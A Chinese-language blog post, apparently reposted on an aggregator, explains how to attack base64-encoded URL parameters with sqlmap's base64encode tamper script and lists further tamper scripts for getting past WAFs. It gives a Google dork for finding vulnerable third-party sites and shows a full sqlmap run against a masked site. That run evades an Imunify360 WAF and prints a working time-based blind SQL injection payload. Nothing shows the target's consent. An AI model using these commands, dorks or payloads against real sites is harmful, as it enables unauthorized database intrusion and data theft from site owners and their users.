2. 程式人生 > 其它 >SQL注入 對方使用base64進行編碼防止注入的破解方法 太簡單。。。

SQL注入 對方使用base64進行編碼防止注入的破解方法 太簡單。。。

阿新 發佈:2021-06-20

上次遇到一個Base64的注入點,手工注入太麻煩,於是在網上看了一下sqlmap Base64注入的方法,如下:

sqlmap -u http://xxxx.com/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs

sqlmap擁有很多功能強力的外掛,外掛的使用方法: -- tamper “外掛名稱”

其中常用到的bypass指令碼繞過SQLMAP主要兩個指令碼:
space2hash.py ,對於MYSQL資料庫 4.0, 5.0注入
space2morehash.py ,對於MYSQL資料庫 >= 5.1.13 和 MySQL 5.1.41 注入
首先確定目標資料庫版本,然後選擇相應的指令碼。
-v 3 --batch --tamper "space2hash.py"
還有其他一些外掛:
encodes編碼 ——charencode.py
base64編碼 —— base64encode.py
替換空格和關鍵字 —— halfversionedmorekeywords.py

轉載於:https://www.cnblogs.com/im404/p/3799626.html

一個實戰例子,在谷歌裡搜尋:

inurl: id=mq==

然後可以看到很多具備類似注入點的站點,然後使用如下命令:

sqlmap -u "https://xxx.com/detail.php?id=MQ==" --tamper base64encode.py 

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:22:24 /2021-06-20/

[11:22:24] [INFO] loading tamper module 'base64encode'
[11:22:25] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ac148cd288a...ec608684d0'). Do you want to use those [Y/n] 
[11:22:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:22:26] [INFO] testing if the target URL content is stable
[11:22:37] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[11:23:08] [CRITICAL] WAF/IPS identified as 'Imunify360 (CloudLinux)'
[11:23:08] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[11:24:00] [INFO] searching for dynamic content
[11:24:01] [INFO] testing if GET parameter 'id' is dynamic
[11:24:01] [WARNING] reflective value(s) found and filtering out
[11:24:01] [INFO] GET parameter 'id' appears to be dynamic
[11:24:04] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[11:24:05] [INFO] testing for SQL injection on GET parameter 'id'
[11:24:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:24:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:24:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:24:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:24:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[11:24:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:24:26] [INFO] testing 'Generic inline queries'
[11:24:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[11:24:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[11:24:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[11:24:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:25:08] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[11:25:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:25:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:25:59] [INFO] checking if the injection point on GET parameter 'id' is a false positive



GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=MQ==' AND (SELECT 9951 FROM (SELECT(SLEEP(5)))lziR) AND 'FGOw'='FGOw
---

是不是很GG。。。

相關推薦

SQL注入 對方使用base64進行編碼防止注入破解方法 簡單

上次遇到一個Base64注入點,手工注入麻煩,於是在網上看了一下sqlmap Base64注入方法,如下:

JDBC:createStatement(sql注入)與PrepareStatement(防止sql注入)程式案例程式碼優化

技術標籤:學習經驗jdbc 把程式中重複的程式碼寫為一個工具類createStatement package cn.dao;

SQL防止注入

package demo; import java.io.File; import java.io.FileOutputStream; import java.io.InputStream; import java.util.regex.Matcher;

SQL注入之DVWA平臺測試mysql注入

今天主要針對mysql常用注入語句進行測試測試環境與工具:測試平臺:DVWA,下載地址:http://down.51cto.com/data/875088,也可下載metaspolit-table2虛擬機器,裡面已經部署好了dvwa.***工具:burpsui

【XSS】通過對HTML響應進行編碼防止跨站點指令碼攻擊

技術標籤:Web 公司將應用程式移動到Web上,以改善客戶互動,降低業務處理成本並加快結果的速度但是這樣做也會增加漏洞-除非安全性是應用程式開發過程中不可或缺的組成部分要了解有關在組織中建立安全文化的

Java如何進行Base64編碼(Encode)與解碼(Decode)?

關於base64編碼Encode和Decode編碼的幾種方式 Base64是一種能將任意Binary資料用64種字元組合成字串的方法,而這個Binary資料和字串資料彼此之間是可以互相轉換的,十分方便在實際應用上,Base64除了能將Binary資料

初學SQL 注入之常見的幾種注入型別

技術標籤:日常操作sql資訊保安安全web SQL注入原理 老生常談,SQL注入攻擊的本質就是把使用者輸入的引數當做SQL語句來執行,Web應用程式對使用者輸入資料的合法性沒有判斷和過濾,攻擊者可以通過構造不同的SQL

Java如何進行Base64編碼(Encode)與解碼(Decode)

關於base64編碼Encode和Decode編碼的幾種方式 Base64是一種能將任意Binary資料用64種字元組合成字串的方法,而這個Binary資料和字串資料彼此之間是可以互相轉換的,十分方便在實際應用上,Base64除了能將Binary資

SQL注入之基礎知識及手工注入

前言 SQL注入是比較常見的網路攻擊方式之一,它不是利用作業系統的BUG來實現攻擊,而是針對程式設計師編寫時的疏忽,通過SQL語句,實現無賬號登入,甚至篡改資料庫

php內一些可以防止注入的函式

一、addslashes() 看名字時,不會這個英文單詞的你此時應該跟我一樣,看不懂單詞,也看不懂這個函式到底是做啥的,那麼現在我們一起來學習一下吧!

Base64編碼實現原理攻略

Base64編碼原理 更多可檢視 點選這裡了 本文將實現: 簡述 ASCII碼字元編碼Base64 編碼實現原理

sql server通過指令碼進行資料庫壓縮全備份的方法【推薦】

問題: 生產環境的資料庫可能比較大,如果直接進行全備而不壓縮的話,備份集就會佔用了大量磁碟空間給備份檔案的存放管理帶來不便

Java基於Base64實現編碼解碼圖片檔案

BASE64 編碼是一種常用的字元編碼,在很多地方都會用到base64不是安全領域下的加密解密演算法能起到安全作用的效果很差,而且很容易破解,他核心作用應該是傳輸資料的正確性,有些閘道器或系統只能使用ASCII字

java使用URLDecoder和URLEncoder對中文字元進行編碼和解碼

摘要:   URLDecoder 和 URLEncoder 用於完成普通字串 和 application/x-www-form-urlencoded MIME 字串之間的相互轉換在本文中,我們以使用URLDecoder解決GET請求中文亂碼問題為場景說明 URLDecoder/URLEncoder

emoji表情進行編碼以適配移動端使用者emoji表情的輸入和展示

功能介紹:使用者輸入emoji表情,如輸入法裡的附帶的表情,然後前端這裡編碼這些表情成特定格式的字元,傳到後端之後從介面拿到後直接html渲染即可

翻譯 RFC 4648: Base16、Base32 和 Base64 資料編碼

每年都會有人嘗試翻譯 RFC 系列文件,為了能更好地迭代和組織所翻譯的內容,我建立了一個 GitHub 倉庫,希望有興趣的人可以參與進來翻譯是個既耗時又費力的事情,因此我期望的是一種細水長流的模式,即使是幾句話的

在Linux中對檔案的編碼及對檔案進行編碼轉換操作

參考:https://www.cnblogs.com/mithrilon/archive/2018/06/03/9082449.html http://blog.chinaunix.net/uid-25266990-id-2853835.html

使用C#.NET呼叫ICU進行編碼檢測和編碼轉換

ICU的C/C++版本:ICU4C 相關API的用法可查閱官方文件,本例只演示使用P/Invoke呼叫

SQL server 2008 R2進行資料查詢操作時提示 “物件名無效”的問題

問題的產生 在SQL server 2008 R2軟體中,已經建立了一個名為Student的資料庫,在其中建立了一個名為dbo.Department的表,接著打算查詢一下表中的內容,因此使用SELECT語句,如下圖所示,表示查詢該表中的

js儲存後臺管理表單內容對於內容中表情包進行編碼轉換傳給後臺

參考借鑑:https://www.cnblogs.com/lisixuan/p/11805062.html 我們在傳給後臺的內容中遇到表情包的時候我們需要把表情包轉化成編碼,然後把編碼傳給後臺例如:我們需要把這個表情轉化成編碼。就如同這樣